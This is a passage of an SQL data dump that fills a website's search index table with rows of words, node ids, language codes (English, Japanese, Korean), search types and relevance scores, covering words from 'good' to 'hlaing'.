('good', 70, 'ko', 'help_search', 1),
('good', 87, 'en', 'node_search', 2),
('good', 113, 'en', 'node_search', 1),
('got', 62, 'en', 'node_search', 1),
('goukaku', 62, 'en', 'node_search', 0.863659),
('government', 23, 'en', 'node_search', 1),
('government', 27, 'en', 'node_search', 0.742984),
('graduate', 30, 'en', 'node_search', 1),
('graduate', 62, 'en', 'node_search', 1),
('graduated', 18, 'en', 'node_search', 1),
('graduated', 18, 'ko', 'node_search', 1),
('grammar', 62, 'en', 'node_search', 1),
('granting', 84, 'en', 'help_search', 1),
('granting', 84, 'ja', 'help_search', 1),
('granting', 84, 'ko', 'help_search', 1),
('gratitude', 133, 'en', 'node_search', 1),
('great', 126, 'en', 'node_search', 1),
('great', 135, 'en', 'node_search', 1),
('great', 156, 'en', 'node_search', 1),
('great', 157, 'en', 'node_search', 1),
('greater', 182, 'en', 'node_search', 1),
('greater', 196, 'en', 'node_search', 1),
('greatly', 178, 'en', 'node_search', 1),
('green', 80, 'en', 'help_search', 1),
('green', 80, 'ja', 'help_search', 1),
('green', 80, 'ko', 'help_search', 1),
('grid', 91, 'en', 'help_search', 4),
('grid', 91, 'ja', 'help_search', 4),
('grid', 91, 'ko', 'help_search', 4),
('grid', 93, 'en', 'help_search', 2),
('grid', 93, 'ja', 'help_search', 2),
('grid', 93, 'ko', 'help_search', 2),
('group', 6, 'en', 'help_search', 19),
('group', 6, 'ja', 'help_search', 19),
('group', 6, 'ko', 'help_search', 19),
('group', 23, 'en', 'help_search', 5.25496),
('group', 23, 'en', 'node_search', 1),
('group', 23, 'ja', 'help_search', 5.25496),
('group', 23, 'ko', 'help_search', 5.25496),
('group', 27, 'en', 'node_search', 1),
('group', 30, 'en', 'help_search', 1),
('group', 30, 'ja', 'help_search', 1),
('group', 30, 'ko', 'help_search', 1),
('group', 32, 'en', 'help_search', 1),
('group', 32, 'ja', 'help_search', 1),
('group', 32, 'ko', 'help_search', 1),
('group', 61, 'en', 'help_search', 1),
('group', 61, 'ja', 'help_search', 1),
('group', 61, 'ko', 'help_search', 1),
('group', 67, 'ja', 'node_search', 1),
('group', 84, 'en', 'help_search', 1),
('group', 84, 'ja', 'help_search', 1),
('group', 84, 'ko', 'help_search', 1),
('group', 135, 'en', 'node_search', 1),
('group', 138, 'en', 'node_search', 1),
('group', 157, 'en', 'node_search', 28),
('grouped', 30, 'en', 'help_search', 1),
('grouped', 30, 'ja', 'help_search', 1),
('grouped', 30, 'ko', 'help_search', 1),
('grouped', 31, 'ja', 'help_search', 1),
('groups', 6, 'en', 'help_search', 22.5589),
('groups', 6, 'ja', 'help_search', 22.5589),
('groups', 6, 'ko', 'help_search', 22.5589),
('groups', 23, 'en', 'help_search', 0.866793),
('groups', 23, 'ja', 'help_search', 0.866793),
('groups', 23, 'ko', 'help_search', 0.866793),
('grow', 176, 'en', 'node_search', 1),
('grow', 194, 'en', 'node_search', 1),
('grow', 197, 'en', 'node_search', 1),
('grown', 23, 'en', 'node_search', 1),
('growth', 62, 'en', 'node_search', 1.83645),
('growth', 165, 'en', 'node_search', 1),
('growth', 169, 'en', 'node_search', 1),
('growth', 171, 'en', 'node_search', 1),
('growth', 174, 'en', 'node_search', 1),
('growth', 177, 'en', 'node_search', 1),
('growth', 184, 'en', 'node_search', 1),
('growth', 185, 'en', 'node_search', 1),
('growth', 190, 'en', 'node_search', 1),
('growth', 191, 'en', 'node_search', 1),
('growth', 198, 'en', 'node_search', 1),
('guidance', 116, 'en', 'node_search', 1),
('guide', 2, 'en', 'help_search', 11),
('guide', 2, 'ja', 'help_search', 11),
('guide', 2, 'ko', 'help_search', 11),
('guide', 29, 'en', 'help_search', 10.123),
('guide', 29, 'ja', 'help_search', 10.123),
('guide', 29, 'ko', 'help_search', 10.123),
('guide', 30, 'en', 'help_search', 21.9999),
('guide', 30, 'ja', 'help_search', 21.9999),
('guide', 30, 'ko', 'help_search', 21.9999),
('guide', 32, 'en', 'help_search', 20.9751),
('guide', 32, 'ja', 'help_search', 20.9751),
('guide', 32, 'ko', 'help_search', 20.9751),
('guide', 33, 'en', 'help_search', 22),
('guide', 33, 'ja', 'help_search', 22),
('guide', 33, 'ko', 'help_search', 22),
('guide', 34, 'en', 'help_search', 22),
('guide', 34, 'ja', 'help_search', 22),
('guide', 34, 'ko', 'help_search', 22),
('guide', 36, 'en', 'help_search', 11),
('guide', 36, 'ja', 'help_search', 11),
('guide', 36, 'ko', 'help_search', 11),
('guide', 38, 'en', 'help_search', 11),
('guide', 38, 'ja', 'help_search', 11),
('guide', 38, 'ko', 'help_search', 11),
('guide', 46, 'en', 'help_search', 1),
('guide', 46, 'ja', 'help_search', 1),
('guide', 46, 'ko', 'help_search', 1),
('guide', 59, 'en', 'help_search', 21.8038),
('guide', 59, 'ja', 'help_search', 21.8038),
('guide', 59, 'ko', 'help_search', 21.8038),
('guide', 60, 'en', 'help_search', 22),
('guide', 60, 'ja', 'help_search', 22),
('guide', 60, 'ko', 'help_search', 22),
('guide', 61, 'en', 'help_search', 20.7671),
('guide', 61, 'ja', 'help_search', 20.7671),
('guide', 61, 'ko', 'help_search', 20.7671),
('guide', 63, 'en', 'help_search', 11),
('guide', 63, 'ja', 'help_search', 11),
('guide', 63, 'ko', 'help_search', 11),
('guide', 65, 'en', 'help_search', 11),
('guide', 65, 'ja', 'help_search', 11),
('guide', 65, 'ko', 'help_search', 11),
('guide', 70, 'en', 'help_search', 11),
('guide', 70, 'ja', 'help_search', 11),
('guide', 70, 'ko', 'help_search', 11),
('guide', 76, 'en', 'help_search', 11),
('guide', 76, 'ja', 'help_search', 11),
('guide', 76, 'ko', 'help_search', 11),
('guide', 79, 'en', 'help_search', 11),
('guide', 79, 'ja', 'help_search', 11),
('guide', 79, 'ko', 'help_search', 11),
('guide', 80, 'en', 'help_search', 9.67522),
('guide', 80, 'ja', 'help_search', 9.67522),
('guide', 80, 'ko', 'help_search', 9.67522),
('guide', 81, 'en', 'help_search', 1),
('guide', 81, 'ja', 'help_search', 1),
('guide', 81, 'ko', 'help_search', 1),
('guide', 91, 'en', 'help_search', 10.4874),
('guide', 91, 'ja', 'help_search', 10.4456),
('guide', 91, 'ko', 'help_search', 10.4874),
('guide', 93, 'en', 'help_search', 8.51611),
('guide', 93, 'ja', 'help_search', 8.51611),
('guide', 93, 'ko', 'help_search', 8.51611);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('guided', 81, 'en', 'help_search', 1),
('guided', 81, 'ja', 'help_search', 1),
('guided', 81, 'ko', 'help_search', 1),
('guided', 136, 'en', 'node_search', 1),
('guiding', 67, 'ja', 'node_search', 1),
('habit', 87, 'en', 'node_search', 1),
('had', 3, 'en', 'node_search', 1),
('had', 3, 'ko', 'node_search', 1),
('had', 27, 'en', 'node_search', 0.822065),
('handles', 93, 'en', 'help_search', 0.800068),
('handles', 93, 'ja', 'help_search', 0.800068),
('handles', 93, 'ko', 'help_search', 0.800068),
('handling', 67, 'en', 'help_search', 3.95608),
('handling', 67, 'ja', 'help_search', 3.95608),
('handling', 67, 'ko', 'help_search', 3.95608),
('hands', 62, 'en', 'node_search', 1),
('handson', 67, 'ja', 'node_search', 1),
('handson', 116, 'en', 'node_search', 1),
('happen', 87, 'en', 'help_search', 1),
('happen', 87, 'ja', 'help_search', 1),
('happen', 87, 'ko', 'help_search', 1),
('happens', 67, 'en', 'help_search', 1),
('happens', 67, 'ja', 'help_search', 1),
('happens', 67, 'ko', 'help_search', 1),
('happens', 72, 'en', 'help_search', 1),
('happens', 72, 'ja', 'help_search', 1),
('happens', 72, 'ko', 'help_search', 1),
('happens', 86, 'en', 'help_search', 1.98902),
('happens', 86, 'ja', 'help_search', 1.98902),
('happens', 86, 'ko', 'help_search', 1.98902),
('happiness', 171, 'en', 'node_search', 1),
('happiness', 174, 'en', 'node_search', 1),
('happiness', 175, 'en', 'node_search', 1),
('happiness', 176, 'en', 'node_search', 1),
('happiness', 177, 'en', 'node_search', 1),
('happy', 67, 'ja', 'node_search', 31),
('hard', 67, 'ja', 'node_search', 1),
('hard', 69, 'en', 'node_search', 1),
('hard', 77, 'en', 'node_search', 4),
('hard', 87, 'en', 'node_search', 3),
('hard', 98, 'en', 'node_search', 1),
('hard', 140, 'en', 'node_search', 1),
('hard', 170, 'en', 'node_search', 1),
('hard', 173, 'en', 'node_search', 1),
('hard', 175, 'en', 'node_search', 1),
('hard', 177, 'en', 'node_search', 1),
('hard', 191, 'en', 'node_search', 27),
('hard', 198, 'en', 'node_search', 1),
('hard', 199, 'en', 'node_search', 1),
('harm', 26, 'en', 'node_search', 1),
('has', 7, 'en', 'help_search', 0.934703),
('has', 7, 'ja', 'help_search', 0.934703),
('has', 7, 'ko', 'help_search', 0.934703),
('has', 11, 'en', 'help_search', 3),
('has', 11, 'ja', 'help_search', 3),
('has', 11, 'ko', 'help_search', 3),
('has', 20, 'en', 'help_search', 2),
('has', 20, 'ja', 'help_search', 2),
('has', 20, 'ko', 'help_search', 2),
('has', 23, 'en', 'node_search', 1),
('has', 24, 'en', 'node_search', 0.816452),
('has', 27, 'en', 'node_search', 0.938382),
('has', 28, 'en', 'help_search', 0.78951),
('has', 28, 'en', 'node_search', 28),
('has', 28, 'ja', 'help_search', 0.78951),
('has', 28, 'ko', 'help_search', 0.78951),
('has', 30, 'en', 'help_search', 5.48026),
('has', 30, 'ja', 'help_search', 5.48026),
('has', 30, 'ko', 'help_search', 5.48026),
('has', 31, 'ja', 'help_search', 1),
('has', 37, 'en', 'help_search', 1),
('has', 37, 'ja', 'help_search', 1),
('has', 37, 'ko', 'help_search', 1),
('has', 38, 'en', 'help_search', 1),
('has', 38, 'ja', 'help_search', 1),
('has', 38, 'ko', 'help_search', 1),
('has', 39, 'en', 'help_search', 1),
('has', 39, 'ja', 'help_search', 1),
('has', 39, 'ko', 'help_search', 1),
('has', 42, 'en', 'help_search', 1),
('has', 42, 'ja', 'help_search', 1),
('has', 42, 'ko', 'help_search', 1),
('has', 43, 'en', 'help_search', 1),
('has', 43, 'ja', 'help_search', 1),
('has', 43, 'ko', 'help_search', 1),
('has', 47, 'en', 'help_search', 36),
('has', 47, 'ja', 'help_search', 36),
('has', 47, 'ko', 'help_search', 36),
('has', 53, 'en', 'help_search', 1),
('has', 53, 'ja', 'help_search', 1),
('has', 53, 'ko', 'help_search', 1),
('has', 57, 'en', 'help_search', 1),
('has', 57, 'ja', 'help_search', 1),
('has', 57, 'ko', 'help_search', 1),
('has', 59, 'en', 'help_search', 1),
('has', 59, 'ja', 'help_search', 1),
('has', 59, 'ko', 'help_search', 1),
('has', 61, 'en', 'help_search', 1),
('has', 61, 'ja', 'help_search', 1),
('has', 61, 'ko', 'help_search', 1),
('has', 62, 'en', 'help_search', 1),
('has', 62, 'ja', 'help_search', 1),
('has', 62, 'ko', 'help_search', 1),
('has', 67, 'en', 'help_search', 2.7299),
('has', 67, 'ja', 'help_search', 2.7299),
('has', 67, 'ko', 'help_search', 2.7299),
('has', 68, 'en', 'help_search', 1),
('has', 68, 'ja', 'help_search', 1),
('has', 68, 'ko', 'help_search', 1),
('has', 72, 'en', 'help_search', 1),
('has', 72, 'ja', 'help_search', 1),
('has', 72, 'ko', 'help_search', 1),
('has', 74, 'en', 'help_search', 1),
('has', 74, 'ja', 'help_search', 1),
('has', 74, 'ko', 'help_search', 1),
('has', 76, 'en', 'help_search', 1),
('has', 76, 'ja', 'help_search', 1),
('has', 76, 'ko', 'help_search', 1),
('has', 77, 'en', 'help_search', 1),
('has', 77, 'ja', 'help_search', 1),
('has', 77, 'ko', 'help_search', 1),
('has', 81, 'en', 'help_search', 1),
('has', 81, 'ja', 'help_search', 1),
('has', 81, 'ko', 'help_search', 1),
('has', 85, 'en', 'help_search', 4),
('has', 85, 'ja', 'help_search', 4),
('has', 85, 'ko', 'help_search', 4),
('has', 122, 'en', 'node_search', 2),
('has', 133, 'en', 'node_search', 1),
('has', 140, 'en', 'node_search', 1),
('has', 142, 'en', 'node_search', 1),
('has', 160, 'en', 'node_search', 1),
('has', 161, 'en', 'node_search', 1),
('has', 166, 'en', 'node_search', 1),
('has', 168, 'en', 'node_search', 1),
('has', 170, 'en', 'node_search', 1),
('has', 171, 'en', 'node_search', 1),
('has', 174, 'en', 'node_search', 1),
('has', 175, 'en', 'node_search', 1),
('has', 177, 'en', 'node_search', 1),
('has', 178, 'en', 'node_search', 1),
('has', 179, 'en', 'node_search', 1),
('has', 180, 'en', 'node_search', 1),
('has', 181, 'en', 'node_search', 1),
('has', 182, 'en', 'node_search', 1),
('has', 183, 'en', 'node_search', 1),
('has', 185, 'en', 'node_search', 2),
('has', 186, 'en', 'node_search', 1),
('has', 187, 'en', 'node_search', 2),
('has', 188, 'en', 'node_search', 2),
('has', 189, 'en', 'node_search', 2),
('has', 190, 'en', 'node_search', 2),
('has', 191, 'en', 'node_search', 2),
('has', 192, 'en', 'node_search', 2),
('has', 193, 'en', 'node_search', 1),
('has', 194, 'en', 'node_search', 1),
('has', 195, 'en', 'node_search', 1),
('has', 196, 'en', 'node_search', 2),
('has', 197, 'en', 'node_search', 2),
('has', 198, 'en', 'node_search', 1),
('has', 199, 'en', 'node_search', 2),
('has', 204, 'en', 'node_search', 4),
('has', 204, 'ja', 'node_search', 4),
('have', 1, 'en', 'node_search', 2),
('have', 3, 'en', 'node_search', 3),
('have', 3, 'ko', 'node_search', 3),
('have', 4, 'en', 'help_search', 1),
('have', 4, 'en', 'node_search', 2),
('have', 4, 'ja', 'help_search', 1),
('have', 4, 'ja', 'node_search', 2),
('have', 4, 'ko', 'help_search', 1),
('have', 5, 'en', 'node_search', 30),
('have', 5, 'ko', 'node_search', 30),
('have', 7, 'en', 'help_search', 3),
('have', 7, 'ja', 'help_search', 3),
('have', 7, 'ko', 'help_search', 3),
('have', 8, 'en', 'help_search', 1),
('have', 8, 'ja', 'help_search', 1),
('have', 8, 'ko', 'help_search', 1),
('have', 11, 'en', 'help_search', 1),
('have', 11, 'ja', 'help_search', 1),
('have', 11, 'ko', 'help_search', 1),
('have', 17, 'en', 'help_search', 1),
('have', 17, 'ja', 'help_search', 1),
('have', 17, 'ko', 'help_search', 1),
('have', 18, 'en', 'help_search', 1),
('have', 18, 'en', 'node_search', 2),
('have', 18, 'ja', 'help_search', 1),
('have', 18, 'ko', 'help_search', 1),
('have', 18, 'ko', 'node_search', 2),
('have', 19, 'en', 'help_search', 1),
('have', 19, 'ja', 'help_search', 1),
('have', 19, 'ko', 'help_search', 1),
('have', 20, 'en', 'help_search', 1),
('have', 20, 'ja', 'help_search', 1),
('have', 20, 'ko', 'help_search', 1),
('have', 22, 'en', 'help_search', 3),
('have', 22, 'ja', 'help_search', 3),
('have', 22, 'ko', 'help_search', 3),
('have', 23, 'en', 'help_search', 0.96498),
('have', 23, 'en', 'node_search', 6),
('have', 23, 'ja', 'help_search', 0.96498),
('have', 23, 'ko', 'help_search', 0.96498),
('have', 24, 'en', 'help_search', 1),
('have', 24, 'en', 'node_search', 2.76676),
('have', 24, 'ja', 'help_search', 1),
('have', 24, 'ko', 'help_search', 1),
('have', 27, 'en', 'help_search', 1),
('have', 27, 'en', 'node_search', 0.740689),
('have', 27, 'ja', 'help_search', 1),
('have', 27, 'ko', 'help_search', 1),
('have', 28, 'en', 'help_search', 4.42848),
('have', 28, 'en', 'node_search', 2),
('have', 28, 'ja', 'help_search', 4.42848),
('have', 28, 'ko', 'help_search', 4.42848),
('have', 30, 'en', 'help_search', 0.866793),
('have', 30, 'en', 'node_search', 4),
('have', 30, 'ja', 'help_search', 0.866793),
('have', 30, 'ko', 'help_search', 0.866793),
('have', 31, 'en', 'node_search', 1.87957),
('have', 31, 'ja', 'help_search', 26.6223),
('have', 32, 'en', 'help_search', 1.99731),
('have', 32, 'ja', 'help_search', 1.99731),
('have', 32, 'ko', 'help_search', 1.99731),
('have', 33, 'en', 'help_search', 1),
('have', 33, 'ja', 'help_search', 1),
('have', 33, 'ko', 'help_search', 1),
('have', 35, 'en', 'help_search', 1),
('have', 35, 'ja', 'help_search', 1),
('have', 35, 'ko', 'help_search', 1),
('have', 38, 'en', 'help_search', 1),
('have', 38, 'ja', 'help_search', 1),
('have', 38, 'ko', 'help_search', 1),
('have', 39, 'en', 'help_search', 1),
('have', 39, 'ja', 'help_search', 1),
('have', 39, 'ko', 'help_search', 1),
('have', 40, 'en', 'help_search', 2),
('have', 40, 'ja', 'help_search', 2),
('have', 40, 'ko', 'help_search', 2),
('have', 41, 'en', 'help_search', 2),
('have', 41, 'ja', 'help_search', 2),
('have', 41, 'ko', 'help_search', 2),
('have', 46, 'en', 'help_search', 1),
('have', 46, 'ja', 'help_search', 1),
('have', 46, 'ko', 'help_search', 1),
('have', 48, 'en', 'help_search', 1),
('have', 48, 'ja', 'help_search', 1),
('have', 48, 'ko', 'help_search', 1),
('have', 49, 'en', 'help_search', 1),
('have', 49, 'ja', 'help_search', 1),
('have', 49, 'ko', 'help_search', 1),
('have', 50, 'en', 'help_search', 3),
('have', 50, 'ja', 'help_search', 3),
('have', 50, 'ko', 'help_search', 3),
('have', 52, 'en', 'help_search', 1),
('have', 52, 'ja', 'help_search', 1),
('have', 52, 'ko', 'help_search', 1),
('have', 53, 'en', 'help_search', 1),
('have', 53, 'ja', 'help_search', 1),
('have', 53, 'ko', 'help_search', 1),
('have', 54, 'en', 'help_search', 1),
('have', 54, 'ja', 'help_search', 1),
('have', 54, 'ko', 'help_search', 1),
('have', 56, 'en', 'help_search', 1),
('have', 56, 'ja', 'help_search', 1),
('have', 56, 'ko', 'help_search', 1),
('have', 59, 'en', 'help_search', 1),
('have', 59, 'ja', 'help_search', 1),
('have', 59, 'ko', 'help_search', 1),
('have', 60, 'en', 'help_search', 3),
('have', 60, 'ja', 'help_search', 3),
('have', 60, 'ko', 'help_search', 3),
('have', 62, 'en', 'help_search', 1),
('have', 62, 'en', 'node_search', 1),
('have', 62, 'ja', 'help_search', 1),
('have', 62, 'ko', 'help_search', 1),
('have', 65, 'en', 'help_search', 1),
('have', 65, 'ja', 'help_search', 1),
('have', 65, 'ko', 'help_search', 1),
('have', 66, 'en', 'help_search', 1),
('have', 66, 'ja', 'help_search', 1),
('have', 67, 'en', 'help_search', 0.942091),
('have', 67, 'ja', 'help_search', 0.942091),
('have', 67, 'ja', 'node_search', 3),
('have', 67, 'ko', 'help_search', 0.942091),
('have', 68, 'en', 'help_search', 2),
('have', 68, 'ja', 'help_search', 2),
('have', 68, 'ko', 'help_search', 2),
('have', 69, 'en', 'help_search', 3),
('have', 69, 'ja', 'help_search', 3),
('have', 69, 'ko', 'help_search', 3),
('have', 70, 'en', 'help_search', 1),
('have', 70, 'ja', 'help_search', 1),
('have', 70, 'ko', 'help_search', 1),
('have', 73, 'en', 'node_search', 1),
('have', 75, 'en', 'help_search', 1),
('have', 75, 'ja', 'help_search', 1),
('have', 75, 'ko', 'help_search', 1),
('have', 76, 'en', 'help_search', 3),
('have', 76, 'ja', 'help_search', 3),
('have', 76, 'ko', 'help_search', 3),
('have', 79, 'en', 'help_search', 1),
('have', 79, 'ja', 'help_search', 1),
('have', 79, 'ko', 'help_search', 1),
('have', 80, 'en', 'help_search', 3),
('have', 80, 'ja', 'help_search', 3),
('have', 80, 'ko', 'help_search', 3),
('have', 81, 'en', 'help_search', 1),
('have', 81, 'ja', 'help_search', 1),
('have', 81, 'ko', 'help_search', 1),
('have', 82, 'en', 'help_search', 1),
('have', 82, 'ja', 'help_search', 1),
('have', 82, 'ko', 'help_search', 1),
('have', 84, 'en', 'help_search', 2),
('have', 84, 'ja', 'help_search', 2),
('have', 84, 'ko', 'help_search', 2),
('have', 85, 'en', 'help_search', 2),
('have', 85, 'ja', 'help_search', 2),
('have', 85, 'ko', 'help_search', 2),
('have', 89, 'en', 'help_search', 1.99731),
('have', 89, 'ja', 'help_search', 1.99315),
('have', 89, 'ko', 'help_search', 1.99731),
('have', 91, 'en', 'help_search', 2.99731),
('have', 91, 'ja', 'help_search', 2.99315),
('have', 91, 'ko', 'help_search', 2.99731),
('have', 92, 'en', 'help_search', 5),
('have', 92, 'ja', 'help_search', 5),
('have', 92, 'ko', 'help_search', 5),
('have', 93, 'en', 'help_search', 3.66728),
('have', 93, 'ja', 'help_search', 3.66728),
('have', 93, 'ko', 'help_search', 3.66728),
('have', 98, 'en', 'node_search', 2),
('have', 120, 'en', 'node_search', 4),
('have', 133, 'en', 'node_search', 1),
('have', 136, 'en', 'node_search', 2),
('have', 140, 'en', 'node_search', 1),
('have', 169, 'en', 'node_search', 1),
('have', 173, 'en', 'node_search', 1),
('have', 176, 'en', 'node_search', 1),
('have', 178, 'en', 'node_search', 1),
('have', 195, 'en', 'node_search', 1),
('haven', 40, 'en', 'help_search', 1),
('haven', 40, 'ja', 'help_search', 1),
('haven', 40, 'ko', 'help_search', 1),
('having', 93, 'en', 'help_search', 0.949597),
('having', 93, 'ja', 'help_search', 0.949597),
('having', 93, 'ko', 'help_search', 0.949597),
('having', 181, 'en', 'node_search', 1),
('header', 61, 'en', 'help_search', 1),
('header', 61, 'ja', 'help_search', 1),
('header', 61, 'ko', 'help_search', 1),
('header', 93, 'en', 'help_search', 3.9074),
('header', 93, 'ja', 'help_search', 3.9074),
('header', 93, 'ko', 'help_search', 3.9074),
('heading', 1, 'en', 'help_search', 1),
('heading', 1, 'ja', 'help_search', 1),
('heading', 1, 'ko', 'help_search', 1),
('heading', 2, 'en', 'help_search', 1),
('heading', 2, 'ja', 'help_search', 1),
('heading', 2, 'ko', 'help_search', 1),
('heading', 46, 'en', 'help_search', 1),
('heading', 46, 'ja', 'help_search', 1),
('heading', 46, 'ko', 'help_search', 1),
('health', 8, 'en', 'node_search', 2),
('health', 27, 'en', 'node_search', 2.33387),
('health', 31, 'en', 'node_search', 1),
('health', 76, 'en', 'help_search', 2),
('health', 76, 'ja', 'help_search', 2),
('health', 76, 'ko', 'help_search', 2),
('health', 77, 'en', 'node_search', 4),
('health', 80, 'en', 'node_search', 1),
('health', 111, 'en', 'node_search', 1),
('health', 113, 'en', 'node_search', 1),
('healthy', 5, 'en', 'node_search', 1),
('healthy', 5, 'ko', 'node_search', 1),
('healthy', 18, 'en', 'node_search', 1),
('healthy', 18, 'ko', 'node_search', 1),
('heartfelt', 160, 'en', 'node_search', 1),
('heartfelt', 166, 'en', 'node_search', 1),
('heartfelt', 170, 'en', 'node_search', 1),
('heartfelt', 171, 'en', 'node_search', 1),
('heartfelt', 189, 'en', 'node_search', 1),
('heartfelt', 198, 'en', 'node_search', 1),
('height', 6, 'en', 'help_search', 28),
('height', 6, 'ja', 'help_search', 28),
('height', 6, 'ko', 'help_search', 28),
('height', 48, 'en', 'help_search', 4),
('height', 48, 'ja', 'help_search', 4),
('height', 48, 'ko', 'help_search', 4),
('held', 142, 'en', 'node_search', 1),
('help', 1, 'en', 'node_search', 1),
('help', 24, 'en', 'help_search', 4),
('help', 24, 'ja', 'help_search', 4),
('help', 24, 'ko', 'help_search', 4),
('help', 27, 'en', 'help_search', 4),
('help', 27, 'ja', 'help_search', 4),
('help', 27, 'ko', 'help_search', 4),
('help', 33, 'en', 'help_search', 1),
('help', 33, 'ja', 'help_search', 1),
('help', 33, 'ko', 'help_search', 1),
('help', 34, 'en', 'help_search', 1),
('help', 34, 'ja', 'help_search', 1),
('help', 34, 'ko', 'help_search', 1),
('help', 43, 'en', 'help_search', 7.4272),
('help', 43, 'ja', 'help_search', 7.4272),
('help', 43, 'ko', 'help_search', 7.4272),
('help', 45, 'en', 'help_search', 54),
('help', 45, 'ja', 'help_search', 54),
('help', 45, 'ko', 'help_search', 54),
('help', 46, 'en', 'help_search', 151.109),
('help', 46, 'ja', 'help_search', 151.109),
('help', 46, 'ko', 'help_search', 151.109),
('help', 67, 'en', 'help_search', 4),
('help', 67, 'ja', 'help_search', 4),
('help', 67, 'ko', 'help_search', 4),
('help', 68, 'en', 'help_search', 2),
('help', 68, 'ja', 'help_search', 2),
('help', 68, 'ko', 'help_search', 2),
('help', 84, 'en', 'help_search', 1),
('help', 84, 'ja', 'help_search', 1),
('help', 84, 'ko', 'help_search', 1),
('help', 155, 'en', 'node_search', 1),
('helps', 29, 'en', 'help_search', 0.972861),
('helps', 29, 'ja', 'help_search', 0.972861),
('helps', 29, 'ko', 'help_search', 0.972861),
('helptopics', 46, 'en', 'help_search', 8),
('helptopics', 46, 'ja', 'help_search', 8),
('helptopics', 46, 'ko', 'help_search', 8),
('her', 156, 'en', 'node_search', 5),
('her', 160, 'en', 'node_search', 4),
('her', 161, 'en', 'node_search', 3),
('her', 164, 'en', 'node_search', 3),
('her', 166, 'en', 'node_search', 3),
('her', 168, 'en', 'node_search', 3),
('her', 170, 'en', 'node_search', 2),
('her', 171, 'en', 'node_search', 4),
('her', 174, 'en', 'node_search', 3),
('her', 175, 'en', 'node_search', 4),
('her', 177, 'en', 'node_search', 5),
('her', 178, 'en', 'node_search', 6),
('her', 179, 'en', 'node_search', 2),
('her', 180, 'en', 'node_search', 4),
('her', 181, 'en', 'node_search', 5),
('her', 182, 'en', 'node_search', 4),
('her', 183, 'en', 'node_search', 4),
('her', 185, 'en', 'node_search', 4),
('her', 186, 'en', 'node_search', 6),
('her', 187, 'en', 'node_search', 4),
('her', 188, 'en', 'node_search', 5),
('her', 189, 'en', 'node_search', 4),
('her', 190, 'en', 'node_search', 3),
('her', 191, 'en', 'node_search', 6),
('her', 192, 'en', 'node_search', 4),
('her', 193, 'en', 'node_search', 5),
('her', 194, 'en', 'node_search', 7),
('her', 195, 'en', 'node_search', 5),
('her', 196, 'en', 'node_search', 5),
('her', 197, 'en', 'node_search', 3),
('her', 198, 'en', 'node_search', 6),
('her', 199, 'en', 'node_search', 7),
('here', 1, 'en', 'node_search', 2),
('here', 7, 'en', 'help_search', 0.920273),
('here', 7, 'ja', 'help_search', 0.920273),
('here', 7, 'ko', 'help_search', 0.920273),
('here', 13, 'en', 'help_search', 4),
('here', 13, 'ja', 'help_search', 4),
('here', 13, 'ko', 'help_search', 4),
('here', 15, 'en', 'help_search', 4),
('here', 15, 'ja', 'help_search', 4),
('here', 15, 'ko', 'help_search', 4),
('here', 34, 'en', 'help_search', 1),
('here', 34, 'ja', 'help_search', 1),
('here', 34, 'ko', 'help_search', 1),
('here', 65, 'en', 'help_search', 1),
('here', 65, 'ja', 'help_search', 1),
('here', 65, 'ko', 'help_search', 1),
('heritage', 122, 'en', 'node_search', 1),
('hesitate', 1, 'en', 'node_search', 1),
('hidden', 7, 'en', 'help_search', 4.47703),
('hidden', 7, 'ja', 'help_search', 4.47703),
('hidden', 7, 'ko', 'help_search', 4.47703),
('hidden', 9, 'en', 'help_search', 5),
('hidden', 9, 'ja', 'help_search', 5),
('hidden', 9, 'ko', 'help_search', 5),
('hidden', 25, 'en', 'help_search', 8),
('hidden', 25, 'ja', 'help_search', 8),
('hide', 23, 'en', 'help_search', 1),
('hide', 23, 'ja', 'help_search', 1),
('hide', 23, 'ko', 'help_search', 1),
('hide', 25, 'en', 'help_search', 1),
('hide', 25, 'ja', 'help_search', 1),
('hierarchical', 80, 'en', 'help_search', 1),
('hierarchical', 80, 'ja', 'help_search', 1),
('hierarchical', 80, 'ko', 'help_search', 1),
('hierarchy', 58, 'en', 'help_search', 1),
('hierarchy', 58, 'ja', 'help_search', 1),
('hierarchy', 58, 'ko', 'help_search', 1),
('hierarchy', 80, 'en', 'help_search', 1),
('hierarchy', 80, 'ja', 'help_search', 1),
('hierarchy', 80, 'ko', 'help_search', 1),
('high', 27, 'en', 'node_search', 1.56168),
('higher', 10, 'en', 'node_search', 1),
('higher', 10, 'ko', 'node_search', 1),
('higher', 181, 'en', 'node_search', 1),
('higher', 183, 'en', 'node_search', 1),
('highlight', 81, 'en', 'help_search', 1),
('highlight', 81, 'ja', 'help_search', 1),
('highlight', 81, 'ko', 'help_search', 1),
('highlights', 66, 'en', 'node_search', 4),
('highly', 76, 'en', 'help_search', 1),
('highly', 76, 'ja', 'help_search', 1),
('highly', 76, 'ko', 'help_search', 1),
('highly', 162, 'en', 'node_search', 1),
('hints', 34, 'en', 'help_search', 1),
('hints', 34, 'ja', 'help_search', 1),
('hints', 34, 'ko', 'help_search', 1),
('history', 27, 'en', 'node_search', 27),
('history', 27, 'ko', 'node_search', 27),
('history', 40, 'en', 'help_search', 1),
('history', 40, 'ja', 'help_search', 1),
('history', 40, 'ko', 'help_search', 1),
('history', 47, 'en', 'help_search', 1),
('history', 47, 'ja', 'help_search', 1),
('history', 47, 'ko', 'help_search', 1),
('hit', 24, 'en', 'node_search', 1.61367),
('hit', 24, 'ja', 'node_search', 0.901662),
('hit', 24, 'ko', 'node_search', 1.61385),
('hit', 28, 'en', 'node_search', 29),
('hit', 28, 'ja', 'node_search', 29),
('hit', 28, 'ko', 'node_search', 29),
('hit', 29, 'en', 'node_search', 3),
('hit', 29, 'ja', 'node_search', 28),
('hit', 29, 'ko', 'node_search', 28),
('hit', 62, 'en', 'node_search', 1.83645),
('hit', 62, 'ja', 'node_search', 1.28173),
('hiv', 31, 'en', 'node_search', 0.953396),
('hla', 129, 'en', 'node_search', 28),
('hla', 129, 'ja', 'node_search', 28),
('hlaing', 128, 'en', 'node_search', 31),
('hlaing', 128, 'ja', 'node_search', 31),
('hlaing', 146, 'en', 'node_search', 29),
('hlaing', 146, 'ja', 'node_search', 1),
('hlaing', 151, 'en', 'node_search', 1),
('hlaing', 151, 'ja', 'node_search', 1),
('hlaing', 152, 'en', 'node_search', 1),
('hlaing', 152, 'ja', 'node_search', 1),
('hlaing', 157, 'en', 'node_search', 1),
('hlaing', 157, 'ja', 'node_search', 1),
('hlaing', 160, 'en', 'node_search', 5),
('hlaing', 160, 'ja', 'node_search', 3.99047),
